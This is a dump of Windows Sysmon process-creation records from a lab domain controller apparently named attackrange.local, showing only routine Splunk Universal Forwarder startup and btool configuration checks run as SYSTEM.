AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7F-6078-C700-00000000AE01}2616C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 154100x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.128{A8622C2F-3E7F-6078-C700-00000000AE01}2616C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7F-6078-C600-00000000AE01}2976C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 154100x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:15.122{A8622C2F-3E7F-6078-C600-00000000AE01}2976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:14.758{A8622C2F-3E7E-6078-C500-00000000AE01}2844C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004554Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:14.435{A8622C2F-3E7E-6078-C400-00000000AE01}3800C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7E-6078-C300-00000000AE01}2800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 154100x80000000000000004541Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:14.429{A8622C2F-3E7E-6078-C300-00000000AE01}2800C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:14.108{A8622C2F-3E7E-6078-C200-00000000AE01}2824C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7E-6078-C100-00000000AE01}4640C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 154100x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:14.101{A8622C2F-3E7E-6078-C100-00000000AE01}4640C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.743{A8622C2F-3E7D-6078-C000-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7D-6078-BF00-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 154100x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.736{A8622C2F-3E7D-6078-BF00-00000000AE01}4616C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.417{A8622C2F-3E7D-6078-BE00-00000000AE01}4576C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.112{A8622C2F-3E7D-6078-BD00-00000000AE01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.100{A8622C2F-3E7D-6078-BC00-00000000AE01}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E7D-6078-BB00-00000000AE01}3732C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 154100x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:13.094{A8622C2F-3E7D-6078-BB00-00000000AE01}3732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.755{A8622C2F-3E7C-6078-BA00-00000000AE01}3360C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7C-6078-B900-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 154100x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.749{A8622C2F-3E7C-6078-B900-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7C-6078-B800-00000000AE01}4536C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 154100x80000000000000004391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.743{A8622C2F-3E7C-6078-B800-00000000AE01}4536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7C-6078-B100-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.435{A8622C2F-3E7C-6078-B700-00000000AE01}4944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7C-6078-B600-00000000AE01}4512C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000004364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.428{A8622C2F-3E7C-6078-B600-00000000AE01}4512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7C-6078-B500-00000000AE01}3672C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000004351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.422{A8622C2F-3E7C-6078-B500-00000000AE01}3672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7C-6078-B100-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000004337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.103{A8622C2F-3E7C-6078-B400-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7C-6078-B300-00000000AE01}2452C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 154100x80000000000000004324Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.097{A8622C2F-3E7C-6078-B300-00000000AE01}2452C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7C-6078-B200-00000000AE01}2592C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 154100x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.092{A8622C2F-3E7C-6078-B200-00000000AE01}2592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7C-6078-B100-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.080{A8622C2F-3E7C-6078-B100-00000000AE01}4292C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E7C-6078-B000-00000000AE01}4276C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 154100x80000000000000004285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.075{A8622C2F-3E7C-6078-B000-00000000AE01}4276C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:12.038{A8622C2F-3E7C-6078-AE00-00000000AE01}3364C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E7B-6078-AC00-00000000AE01}1496C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 154100x80000000000000004255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:11.742{A8622C2F-3E7B-6078-AC00-00000000AE01}1496C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000004243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:11.478{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:11.187{A8622C2F-3E7B-6078-AA00-00000000AE01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7B-6078-A900-00000000AE01}1180C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 154100x80000000000000004217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:11.180{A8622C2F-3E7B-6078-A900-00000000AE01}1180C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7B-6078-A800-00000000AE01}2840C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 154100x80000000000000004204Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:11.175{A8622C2F-3E7B-6078-A800-00000000AE01}2840C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E77-6078-9400-00000000AE01}3192C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2064 154100x80000000000000004191Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.873{A8622C2F-3E7A-6078-A700-00000000AE01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E7A-6078-A600-00000000AE01}596C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.859{A8622C2F-3E7A-6078-A600-00000000AE01}596C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E7A-6078-A500-00000000AE01}4372C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 154100x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:24:10.854{A8622C2F-3E7A-6078-A500-00000000AE01}4372C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT 